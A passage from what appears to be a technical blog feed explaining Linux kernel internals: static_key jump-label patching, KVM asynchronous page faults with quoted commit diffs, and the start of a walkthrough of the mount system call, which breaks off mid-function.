<li>We need to save the static_key information in the ELF file; this information is stored in the ‘__jump_table’ section of the ELF file</li>
<li>The kernel needs to parse this ‘__jump_table’ information</li>
<li>When we flip the switch, the kernel needs to update the patched code</li>
</ol>
<p>The idea of static_key is illustrated as follows:</p>
<p><img src="/assets/img/static_key/1.png" alt="" /></p>
<p>In most situations the switch stays in its ‘mostly’ state, so the red block is a nop. When we change the state of the switch, the kernel rewrites the red block into a jump instruction so that execution can go to the ‘2’ code flow.</p>
<h3> Store static_key information in ELF file </h3>
<p>static_key is defined by a ‘struct static_key’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key {
atomic_t enabled;
/* Set lsb bit to 1 if branch is default true, 0 otherwise */
struct jump_entry *entries;
#ifdef CONFIG_MODULES
struct static_key_mod *next;
#endif
};
</code></pre></div></div>
<p>‘enabled’ indicates the state of the static_key: 0 means false and 1 means true. ‘entries’ points to the jump label patching information, which is defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct jump_entry {
jump_label_t code;
jump_label_t target;
jump_label_t key;
};
</code></pre></div></div>
<p>‘code’ is the address to be patched, ‘target’ is the address we should jump to, and ‘key’ is the address of the static_key.</p>
<p>The ‘next’ field in static_key is used when modules reference a static_key defined in the kernel image or in other modules.</p>
<p>Let’s use the ‘apic_sw_disabled’ in arch/x86/kvm/lapic.c as an example. It is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred apic_sw_disabled __read_mostly;
</code></pre></div></div>
<p>Here ‘static_key_deferred’ is just a wrapper around static_key; it additionally contains a ‘timeout’ and a ‘delayed_work’ so the update can be done from a delayed work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred {
struct static_key key;
unsigned long timeout;
struct delayed_work work;
};
</code></pre></div></div>
<p>‘apic_sw_disabled’ is used to determine whether the system software enables the local APIC; in most cases the software will enable it, so the default of ‘apic_sw_disabled’ is false. Notice that ‘apic_sw_disabled’ is shared by all vcpus: if any vcpu on the host disables its local APIC, ‘apic_sw_disabled’ becomes true.</p>
<p>In ‘kvm_apic_sw_enabled’, ‘static_key_false’ is called on ‘apic_sw_disabled.key’. ‘static_key_false’ just calls ‘arch_static_branch’, and the latter is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
{
asm_volatile_goto("1:"
".byte " __stringify(STATIC_KEY_INIT_NOP) "\n\t"
".pushsection __jump_table, \"aw\" \n\t"
_ASM_ALIGN "\n\t"
_ASM_PTR "1b, %l[l_yes], %c0 + %c1 \n\t"
".popsection \n\t"
: : "i" (key), "i" (branch) : : l_yes);
return false;
l_yes:
return true;
}
</code></pre></div></div>
<p>‘STATIC_KEY_INIT_NOP’ is a 5-byte no-op instruction, ‘0x0f,0x1f,0x44,0x00,0x00’. This is the red block in the first picture. The data between ‘.pushsection’ and ‘.popsection’ goes into the ‘__jump_table’ section of the ELF file. For every ‘arch_static_branch’ call, three unsigned longs are emitted into ‘__jump_table’. The first is the address of ‘1b’, i.e. the address of the 5-byte no-op. The second is the address of ‘l_yes’, and the third is the static_key’s address ORed with the branch value (0 for static_key_false, 1 for static_key_true).</p>
<p>‘static_key_false’ and ‘arch_static_branch’ are always inlined, so ‘kvm_apic_sw_enabled’ is compiled to the following asm instructions.</p>
<p><img src="/assets/img/static_key/2.png" alt="" /></p>
<p>Notice we have marked ‘kvm_apic_sw_enabled’ as noinline by adding ‘noinline’ to the function definition.</p>
<p>As the instruction at ‘13f70’ is a no-op, ‘kvm_apic_sw_enabled’ always returns 1 here, which is the expected default.</p>
<p>Also, after ‘arch_static_branch’ is compiled, three unsigned longs appear in ‘__jump_table’, laid out as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |no-op address | target address | static_key's address ored with 0|
</code></pre></div></div>
<p>In this function it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |13f79 | 13f85| kvm_apic_sw_enabled.key's address|
</code></pre></div></div>
<p>These three values correspond to a ‘jump_entry’. The address of kvm_apic_sw_enabled.key is a global address.</p>
<p>Notice that ‘13f79’ here is just an offset within the kvm.ko file; it will be relocated during module loading.</p>
<h3> Parses '__jump_table' when startup </h3>
<p>In ‘start_kernel’, ‘jump_label_init’ is called to parse the ‘__jump_table’. For modules, ‘jump_label_init_module’ registers a module notifier named ‘jump_label_module_nb’; when a module is loaded, it calls ‘jump_label_add_module’ to parse the module’s ‘__jump_table’. We will dig into the module case. The code of ‘jump_label_add_module’ follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int jump_label_add_module(struct module *mod)
{
struct jump_entry *iter_start = mod->jump_entries;
struct jump_entry *iter_stop = iter_start + mod->num_jump_entries;
struct jump_entry *iter;
struct static_key *key = NULL;
struct static_key_mod *jlm;
/* if the module doesn't have jump label entries, just return */
if (iter_start == iter_stop)
return 0;
jump_label_sort_entries(iter_start, iter_stop);
for (iter = iter_start; iter < iter_stop; iter++) {
struct static_key *iterk;
iterk = jump_entry_key(iter);
if (iterk == key)
continue;
key = iterk;
if (within_module(iter->key, mod)) {
/*
* Set key->entries to iter, but preserve JUMP_LABEL_TRUE_BRANCH.
*/
*((unsigned long *)&key->entries) += (unsigned long)iter;
key->next = NULL;
continue;
}
...
}
return 0;
}
</code></pre></div></div>
<p>‘iter_start’ points to the first jump entry and ‘iter_stop’ points past the last one.
The jump entries are sorted by the ‘jump_label_sort_entries’ function. We can get the ‘static_key’ of a ‘jump_entry’ by calling the ‘jump_entry_key’ function. Notice that the third field of ‘jump_entry’ is the address of the static_key ORed with 0 or 1, so ‘jump_entry_key’ clears the lowest bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline struct static_key *jump_entry_key(struct jump_entry *entry)
{
return (struct static_key *)((unsigned long)entry->key & ~1UL);
}
</code></pre></div></div>
<p>Then, if the static_key is defined in this module, ‘jump_label_add_module’ sets the static_key’s entries to the address of the ‘jump_entry’. If the static_key is defined in another module, the ‘next’ field of ‘static_key’ is used to record the reference.</p>
<p>After ‘jump_label_add_module’ runs, ‘static_key’ and ‘jump_entry’ have the following relation.</p>
<p><img src="/assets/img/static_key/3.png" alt="" /></p>
<h4> patch the function </h4>
<p>Now the function ‘kvm_apic_sw_enabled’ returns true, meaning ‘apic_sw_disabled.key’ is false. However, at some point we need to change ‘apic_sw_disabled.key’ to true. For example, ‘kvm_create_lapic’ has the following statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static_key_slow_inc(&apic_sw_disabled.key);
</code></pre></div></div>
<p>This means when creating lapic, we need to set ‘apic_sw_disabled.key’ to true.</p>
<p>‘static_key_slow_inc’ calls ‘jump_label_update’ to patch the code, and also sets the static_key’s ‘enabled’ to 1.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void jump_label_update(struct static_key *key)
{
struct jump_entry *stop = __stop___jump_table;
struct jump_entry *entry = static_key_entries(key);
#ifdef CONFIG_MODULES
struct module *mod;
__jump_label_mod_update(key);
preempt_disable();
mod = __module_address((unsigned long)key);
if (mod)
stop = mod->jump_entries + mod->num_jump_entries;
preempt_enable();
#endif
/* if there are no users, entry can be NULL */
if (entry)
__jump_label_update(key, entry, stop);
}
</code></pre></div></div>
<p>‘jump_label_update’ gets the ‘jump_entry’ from the static_key’s ‘entries’ field. The ‘stop’ is either ‘__stop___jump_table’ or the end of the jump entries of the module the static_key belongs to. It then calls ‘__jump_label_update’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_update(struct static_key *key,
struct jump_entry *entry,
struct jump_entry *stop)
{
for (; (entry < stop) && (jump_entry_key(entry) == key); entry++) {
/*
* entry->code set to 0 invalidates module init text sections
* kernel_text_address() verifies we are not in core kernel
* init code, see jump_label_invalidate_module_init().
*/
if (entry->code && kernel_text_address(entry->code))
arch_jump_label_transform(entry, jump_label_type(entry));
}
}
</code></pre></div></div>
<p>After the check, this function calls ‘arch_jump_label_transform’ with the return value of ‘jump_label_type’. The ‘jump_label_type’ function returns the jump type, i.e. whether we should use a nop or a jump.
There are two jump types in kernel 4.4: JUMP_LABEL_NOP (0) and JUMP_LABEL_JMP (1).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum jump_label_type {
JUMP_LABEL_NOP = 0,
JUMP_LABEL_JMP,
};
</code></pre></div></div>
<p>‘jump_label_type’ is implemented as:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static enum jump_label_type jump_label_type(struct jump_entry *entry)
{
struct static_key *key = jump_entry_key(entry);
bool enabled = static_key_enabled(key);
bool branch = jump_entry_branch(entry);
/* See the comment in linux/jump_label.h */
return enabled ^ branch;
}
</code></pre></div></div>
<p>Here ‘enabled’ is non-zero, since ‘static_key_slow_inc’ has incremented the counter; the branch is 0, as the function used was static_key_false, so ‘jump_label_type’ returns 1.</p>
<p>‘arch_jump_label_transform’ calls ‘__jump_label_transform’ with the type (1, JUMP_LABEL_JMP), poker (NULL), and init (0). So the code executed will be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_transform(struct jump_entry *entry,
enum jump_label_type type,
void *(*poker)(void *, const void *, size_t),
int init)
{
union jump_code_union code;
const unsigned char default_nop[] = { STATIC_KEY_INIT_NOP };
const unsigned char *ideal_nop = ideal_nops[NOP_ATOMIC5];
if (type == JUMP_LABEL_JMP) {
if (init) {
...
} else {
/*
* ...otherwise expect an ideal_nop. Otherwise
* something went horribly wrong.
*/
if (unlikely(memcmp((void *)entry->code, ideal_nop, 5)
!= 0))
bug_at((void *)entry->code, __LINE__);
}
code.jump = 0xe9;
code.offset = entry->target -
(entry->code + JUMP_LABEL_NOP_SIZE);
} else {
...
}
...
if (poker)
(*poker)((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE);
else
text_poke_bp((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE,
(void *)entry->code + JUMP_LABEL_NOP_SIZE);
}
</code></pre></div></div>
<p>‘code’ will contain the jump instruction: the first byte is ‘0xe9’ and the following four bytes are the offset to jump. Finally, ‘__jump_label_transform’ calls ‘text_poke_bp’ to rewrite the 5 bytes at ‘entry->code’ into the jump to the other branch. After patching, ‘kvm_apic_sw_enabled’ takes the branch that returns ‘apic->sw_enabled’. In ‘static_key_slow_inc’, after ‘jump_label_update’, ‘key->enabled’ is set to 1.</p>
<p>‘apic_sw_disabled.key’ is later decremented by ‘static_key_slow_dec_deferred’ in ‘apic_set_spiv’, when the guest software-enables the APIC.
The delayed work finally calls ‘__static_key_slow_dec’, which decreases ‘key->enabled’; ‘enabled ^ branch’ then becomes 0, so ‘__jump_label_transform’ patches the code back to the no-op instruction.</p>
<h3> Reference </h3>
<p>[1] <a href="https://github.com/torvalds/linux/blob/master/Documentation/static-keys.txt">kernel static_key doc</a></p>
<p>[2] <a href="https://github.com/linux-wmt/linux-vtwm/commit/fd4363fff3d96795d3feb1b3fb48ce590f186bdd">int3-based instruction patching</a></p>
KVM async page fault2019-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault
<h3> apf introduction </h3>
<p>A qemu/kvm VM’s physical memory is the virtual memory of the qemu process. Since the VM’s memory is backed by qemu’s virtual memory, the host can swap the backing physical pages out. When a guest vcpu accesses memory that has been swapped out by the host, its execution is suspended until the memory is swapped back in. Asynchronous page fault (apf) is a way to use the guest vcpu more efficiently by allowing it to execute other tasks while the page is brought back into memory[1]. The following gives a summary of these processes.</p>
<ol>
<li>
<p>page fault when the EPT page table is not setup</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
no previously mapped page and no swap entry found
empty page is allocated
5. page is added into shadow/nested page table
</code></pre></div> </div>
</li>
<li>
<p>page fault when the physical memory is swapped out(without apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
swap entry is found
page swap-in process is initiated
vcpu thread goes to sleep until page is swapped in
</code></pre></div> </div>
</li>
<li>
<p>page fault when the physical memory is swapped out (with apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_nowait()
5. gup is done by dedicated thread, inject 'page not present' exception to guest
6. guest puts process A(which caused this page fault) to sleep and schedule another process
7. page is swapped in, inject 'page ready' exception to guest
8. guest can schedule process A back to run on vcpu
</code></pre></div> </div>
</li>
</ol>
<p>The following shows the kvm async page fault process.[2]</p>
<p><img src="/assets/img/apf/1.jpg" alt="" /></p>
<p>From the description we know that kvm apf needs guest cooperation: the paravirtualized guest must recognize the apf ‘page not present’ and ‘page ready’ exceptions and hook the exception handler to process these two new exceptions. apf consists of the following steps.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. the guest should be initialized to process the new exception
2. kvm page fault handler should recognize the swapped out case and initialize a work to swap in the page, inject a 'page not present' to guest
3. the guest receive this exception and schedule another process to run
4. when the page caused page fault in step 2 has been swapped in, the kvm inject a 'page ready' exception to guest
5. the guest can do schedule to run process that was blocked by page fault in step 2
</code></pre></div></div>
<p>The next part discusses the code behind the above process.</p>
<h3> detail of apf </h3>
<h4> para guest initialization when startup </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=fd10cde9294f73eeccbc16f3fec1ae6cde7b800c">KVM paravirt: Add async PF initialization to PV guest.</a></p>
<p>Here we can see that apf is enabled by default and can be disabled with the ‘no-kvmapf’ parameter on the kernel command line.</p>
<p>Every CPU has a per-cpu variable named ‘apf_reason’, defined as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_vcpu_pv_apf_data {
+ __u32 reason;
+ __u8 pad[60];
+ __u32 enabled;
+};
</code></pre></div></div>
<p>The ‘reason’ here is the apf exception, either ‘KVM_PV_REASON_PAGE_NOT_PRESENT’(1) or ‘KVM_PV_REASON_PAGE_READY’(2); the ‘enabled’ field indicates whether apf is enabled.</p>
<p>If KVM supports apf, the ‘KVM_CPUID_FEATURES’ cpuid leaf has the ‘KVM_FEATURE_ASYNC_PF’ feature. When the guest detects this feature, it writes the physical address of ‘apf_reason’ to the msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void __cpuinit kvm_guest_cpu_init(void)
+{
+ if (!kvm_para_available())
+ return;
+
+ if (kvm_para_has_feature(KVM_FEATURE_ASYNC_PF) && kvmapf) {
+ u64 pa = __pa(&__get_cpu_var(apf_reason));
+
+ wrmsrl(MSR_KVM_ASYNC_PF_EN, pa | KVM_ASYNC_PF_ENABLED);
+ __get_cpu_var(apf_reason).enabled = 1;
+ printk(KERN_INFO"KVM setup async PF for cpu %d\n",
+ smp_processor_id());
+ }
+}
</code></pre></div></div>
<h4> guest process the apf exception </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=631bc4878220932fe67fc46fc7cf7cccdb1ec597">KVM: Handle async PF in a guest</a></p>
<p>During initialization, the guest sets the trap init hook to ‘kvm_apf_trap_init’, which sets gate 14’s (page fault) handler to ‘async_page_fault’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __init kvm_apf_trap_init(void)
+{
+ set_intr_gate(14, &async_page_fault);
+}
</code></pre></div></div>
<p>‘async_page_fault’ calls ‘do_async_page_fault’. The latter first reads and resets the apf reason:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +u32 kvm_read_and_reset_pf_reason(void)
+{
+ u32 reason = 0;
+
+ if (__get_cpu_var(apf_reason).enabled) {
+ reason = __get_cpu_var(apf_reason).reason;
+ __get_cpu_var(apf_reason).reason = 0;
+ }
+
+ return reason;
+}
+dotraplinkage void __kprobes
+do_async_page_fault(struct pt_regs *regs, unsigned long error_code)
+{
+ switch (kvm_read_and_reset_pf_reason()) {
+ default:
+ do_page_fault(regs, error_code);
+ break;
+ case KVM_PV_REASON_PAGE_NOT_PRESENT:
+ /* page is swapped out by the host. */
+ kvm_async_pf_task_wait((u32)read_cr2());
+ break;
+ case KVM_PV_REASON_PAGE_READY:
+ kvm_async_pf_task_wake((u32)read_cr2());
+ break;
+ }
+}
+
</code></pre></div></div>
<p>The apf reason is written to the ‘apf_reason.reason’ field by KVM, and the guest reads it out. When the apf reason is ‘KVM_PV_REASON_PAGE_NOT_PRESENT’, the guest calls ‘kvm_async_pf_task_wait’, which adds the current process to a sleep list and reschedules. When the guest receives ‘KVM_PV_REASON_PAGE_READY’, it calls ‘kvm_async_pf_task_wake’ to wake up the sleeping process.</p>
<h4> kvm support for the apf cpuid feature and msr</h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=344d9588a9df06182684168be4f1408b55c7da3e">KVM: Add PV MSR to enable asynchronous page faults delivery</a></p>
<p>As we discussed, KVM should support the ‘KVM_FEATURE_ASYNC_PF’ cpuid feature and the msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<p>When the guest writes to the msr ‘MSR_KVM_ASYNC_PF_EN’, the kvm module calls ‘kvm_pv_enable_async_pf’. This function saves the msr value to the vcpu’s arch field ‘apf.msr_val’. ‘kvm_gfn_to_hva_cache_init’ creates a gpa-to-hva ‘cache’ so that KVM can write data to the guest more efficiently.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_pv_enable_async_pf(struct kvm_vcpu *vcpu, u64 data)
+{
+ gpa_t gpa = data & ~0x3f;
+
+ /* Bits 1:5 are resrved, Should be zero */
+ if (data & 0x3e)
+ return 1;
+
+ vcpu->arch.apf.msr_val = data;
+
+ if (!(data & KVM_ASYNC_PF_ENABLED)) {
+ kvm_clear_async_pf_completion_queue(vcpu);
+ kvm_async_pf_hash_reset(vcpu);
+ return 0;
+ }
+
+ if (kvm_gfn_to_hva_cache_init(vcpu->kvm, &vcpu->arch.apf.data, gpa))
+ return 1;
+
+ kvm_async_pf_wakeup_all(vcpu);
+ return 0;
+}
+
</code></pre></div></div>
<h4> kvm does the apf work </h4>
<p>There are two commits in this part.
commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=af585b921e5d1e919947c4b1164b59507fe7cd7b">KVM: Halt vcpu if page it tries to access is swapped out</a> sets up the framework of apf.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> does the final work.</p>
<p>Let’s first look at the first commit.</p>
<p>Every apf work item is represented by the following structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_async_pf {
+ struct work_struct work;
+ struct list_head link;
+ struct list_head queue;
+ struct kvm_vcpu *vcpu;
+ struct mm_struct *mm;
+ gva_t gva;
+ unsigned long addr;
+ struct kvm_arch_async_pf arch;
+ struct page *page;
+ bool done;
+};
</code></pre></div></div>
<p>apf happens in the page fault path, in ‘tdp_page_fault’. So this commit adds a call to a new function, ‘try_async_pf’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static bool try_async_pf(struct kvm_vcpu *vcpu, gfn_t gfn, gva_t gva,
+ pfn_t *pfn)
+{
+ bool async;
+
+ *pfn = gfn_to_pfn_async(vcpu->kvm, gfn, &async);
+
+ if (!async)
+ return false; /* *pfn has correct page already */
+
+ put_page(pfn_to_page(*pfn));
+
+ if (can_do_async_pf(vcpu)) {
+ trace_kvm_try_async_get_page(async, *pfn);
+ if (kvm_find_async_pf_gfn(vcpu, gfn)) {
+ trace_kvm_async_pf_doublefault(gva, gfn);
+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ return true;
+ } else if (kvm_arch_setup_async_pf(vcpu, gva, gfn))
+ return true;
+ }
+
+ *pfn = gfn_to_pfn(vcpu->kvm, gfn);
+
+ return false;
+}
+int kvm_setup_async_pf(struct kvm_vcpu *vcpu, gva_t gva, gfn_t gfn,
+ struct kvm_arch_async_pf *arch)
+{
+ struct kvm_async_pf *work;
+
+ if (vcpu->async_pf.queued >= ASYNC_PF_PER_VCPU)
+ return 0;
+
+ /* setup delayed work */
+
+ /*
+ * do alloc nowait since if we are going to sleep anyway we
+ * may as well sleep faulting in page
+ */
+ work = kmem_cache_zalloc(async_pf_cache, GFP_NOWAIT);
+ if (!work)
+ return 0;
+
+ work->page = NULL;
+ work->done = false;
+ work->vcpu = vcpu;
+ work->gva = gva;
+ work->addr = gfn_to_hva(vcpu->kvm, gfn);
+ work->arch = *arch;
+ work->mm = current->mm;
+ atomic_inc(&work->mm->mm_count);
+ kvm_get_kvm(work->vcpu->kvm);
+
+ /* this can't really happen otherwise gfn_to_pfn_async
+ would succeed */
+ if (unlikely(kvm_is_error_hva(work->addr)))
+ goto retry_sync;
+
+ INIT_WORK(&work->work, async_pf_execute);
+ if (!schedule_work(&work->work))
+ goto retry_sync;
+
+ list_add_tail(&work->queue, &vcpu->async_pf.queue);
+ vcpu->async_pf.queued++;
+ kvm_arch_async_page_not_present(vcpu, work);
+ return 1;
+retry_sync:
+ kvm_put_kvm(work->vcpu->kvm);
+ mmdrop(work->mm);
+ kmem_cache_free(async_pf_cache, work);
+ return 0;
+}
</code></pre></div></div>
<p>If KVM can do apf, it calls ‘kvm_setup_async_pf’ (via ‘kvm_arch_setup_async_pf’) to queue a work item and calls ‘kvm_arch_async_page_not_present’ to notify the guest. As this commit just sets up the apf framework, ‘kvm_arch_async_page_not_present’ doesn’t inject an interrupt yet.</p>
<p>‘kvm_setup_async_pf’ initializes a ‘work_struct’ whose function is ‘async_pf_execute’. ‘async_pf_execute’ swaps in the faulting page.</p>
<p>Then in ‘__vcpu_run’, when the guest VM-exits, KVM calls ‘kvm_check_async_pf_completion’ to check whether the apf work is done. This is the first version of apf, called the ‘batch mechanism’. Commit <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=e0ead41a6dac09f86675ce07a66e4b253a9b7bd5">KVM: async_pf: Provide additional direct page notification</a> adds a config option ‘KVM_ASYNC_PF_SYNC’. When it is selected, KVM notifies the guest directly.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> is easy to understand.</p>
<p>Following is the core: when the page is not present, KVM can either halt the vcpu or inject ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ into the guest. When the async page is ready, KVM injects ‘KVM_PV_REASON_PAGE_READY’ into the guest.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void kvm_arch_async_page_not_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_not_present(work->gva);
-
- kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ trace_kvm_async_pf_not_present(work->arch.token, work->gva);
kvm_add_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if (!(vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) ||
+ kvm_x86_ops->get_cpl(vcpu) == 0)
+ kvm_make_request(KVM_REQ_APF_HALT, vcpu);
+ else if (!apf_put_user(vcpu, KVM_PV_REASON_PAGE_NOT_PRESENT)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
}
void kvm_arch_async_page_present(struct kvm_vcpu *vcpu,
struct kvm_async_pf *work)
{
- trace_kvm_async_pf_ready(work->gva);
- kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+ trace_kvm_async_pf_ready(work->arch.token, work->gva);
+ if (is_error_page(work->page))
+ work->arch.token = ~0; /* broadcast wakeup */
+ else
+ kvm_del_async_pf_gfn(vcpu, work->arch.gfn);
+
+ if ((vcpu->arch.apf.msr_val & KVM_ASYNC_PF_ENABLED) &&
+ !apf_put_user(vcpu, KVM_PV_REASON_PAGE_READY)) {
+ vcpu->arch.fault.error_code = 0;
+ vcpu->arch.fault.address = work->arch.token;
+ kvm_inject_page_fault(vcpu);
+ }
+}
</code></pre></div></div>
<h3> Reference </h3>
<p>[1] <a href="https://www.linux-kvm.org/images/a/ac/2010-forum-Async-page-faults.pdf">Asynchronous page faults</a></p>
<p>[2] <a href="https://www.kernelnote.com/entry/kvmguestswap">从kvm场景下guest访问的内存被swap出去之后说起</a></p>
system call analysis: mount2019-02-23T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/02/23/linux-system-call-mount
<p>The data on disk is just raw bytes; the user needs to access this data as files, so there should be a layer to abstract it. This is what a file system does.</p>
<p>Linux supports a lot of file systems of various kinds: for example, ext2/3/4 and xfs are for local storage, proc and sys are pseudo file systems, and nfs is a network file system.</p>
<p>Whenever we want to use new storage, we first need to make a file system on it and then mount it in the OS. After that, the user can access the data on the new storage.</p>
<p>This post is a note on the mount system call.
Following is the definition of the mount system call:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <sys/mount.h>
int mount(const char *source, const char *target,
const char *filesystemtype, unsigned long mountflags,
const void *data);
</code></pre></div></div>
<p>The first argument ‘source’ often specifies a storage device’s pathname.
The second argument ‘target’ specifies the location where ‘source’ will be attached.
‘filesystemtype’ specifies the file system name, such as ‘ext4’, ‘xfs’, ‘iso9660’ and so on.
The final argument ‘data’ is interpreted by the individual file systems.</p>
<p>mount syscall is defined in fs/namespace.c.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE5(mount, char __user *, dev_name, char __user *, dir_name,
char __user *, type, unsigned long, flags, void __user *, data)
{
int ret;
char *kernel_type;
char *kernel_dev;
unsigned long data_page;
kernel_type = copy_mount_string(type);
ret = PTR_ERR(kernel_type);
if (IS_ERR(kernel_type))
goto out_type;
kernel_dev = copy_mount_string(dev_name);
ret = PTR_ERR(kernel_dev);
if (IS_ERR(kernel_dev))
goto out_dev;
ret = copy_mount_options(data, &data_page);
if (ret < 0)
goto out_data;
ret = do_mount(kernel_dev, dir_name, kernel_type, flags,
(void *) data_page);
free_page(data_page);
out_data:
kfree(kernel_dev);
out_dev:
kfree(kernel_type);
out_type:
return ret;
}
</code></pre></div></div>
<p>It copies the userspace arguments to the kernel and then transfers control to ‘do_mount’.</p>
<p>‘do_mount’ first gets the ‘path’ struct of the userspace-specified directory path. Struct ‘path’ contains a ‘vfsmount’ and a ‘dentry’ and is used to represent a directory path’s dentry.
Then ‘do_mount’ dispatches on the ‘flags’ value and calls the corresponding function, such as ‘do_remount’, ‘do_loopback’, ‘do_change_type’ and so on. The default call is ‘do_new_mount’, which adds a new mount to a directory.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_new_mount(struct path *path, const char *fstype, int flags,
int mnt_flags, const char *name, void *data)
{
struct file_system_type *type;
struct user_namespace *user_ns = current->nsproxy->mnt_ns->user_ns;
struct vfsmount *mnt;
int err;
if (!fstype)
return -EINVAL;
type = get_fs_type(fstype);
if (!type)
return -ENODEV;
if (user_ns != &init_user_ns) {
if (!(type->fs_flags & FS_USERNS_MOUNT)) {
put_filesystem(type);
return -EPERM;
}
/* Only in special cases allow devices from mounts
* created outside the initial user namespace.
*/
if (!(type->fs_flags & FS_USERNS_DEV_MOUNT)) {
flags |= MS_NODEV;
mnt_flags |= MNT_NODEV | MNT_LOCK_NODEV;
}
if (type->fs_flags & FS_USERNS_VISIBLE) {
if (!fs_fully_visible(type, &mnt_flags)) {
put_filesystem(type);
return -EPERM;
}
}
}
mnt = vfs_kern_mount(type, flags, name, data);
if (!IS_ERR(mnt) && (type->fs_flags & FS_HAS_SUBTYPE) &&
!mnt->mnt_sb->s_subtype)
mnt = fs_set_subtype(mnt, fstype);
put_filesystem(type);
if (IS_ERR(mnt))
return PTR_ERR(mnt);
err = do_add_mount(real_mount(mnt), path, mnt_flags);
if (err)
mntput(mnt);
return err;
}
</code></pre></div></div>
<p>The main functions called by ‘do_new_mount’ are ‘vfs_kern_mount’ and ‘do_add_mount’.
‘vfs_kern_mount’ creates and initializes a new ‘mount’ to represent this new mount.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfsmount *
vfs_kern_mount(struct file_system_type *type, int flags, const char *name, void *data)
{
struct mount *mnt;
struct dentry *root;
if (!type)
return ERR_PTR(-ENODEV);
mnt = alloc_vfsmnt(name);
if (!mnt)
return ERR_PTR(-ENOMEM);
if (flags & MS_KERNMOUNT)
mnt->mnt.mnt_flags = MNT_INTERNAL;
root = mount_fs(type, flags, name, data);
if (IS_ERR(root)) {
mnt_free_id(mnt);
free_vfsmnt(mnt);
return ERR_CAST(root);
}
mnt->mnt.mnt_root = root;
mnt->mnt.mnt_sb = root->d_sb;
mnt->mnt_mountpoint = mnt->mnt.mnt_root;
mnt->mnt_parent = mnt;
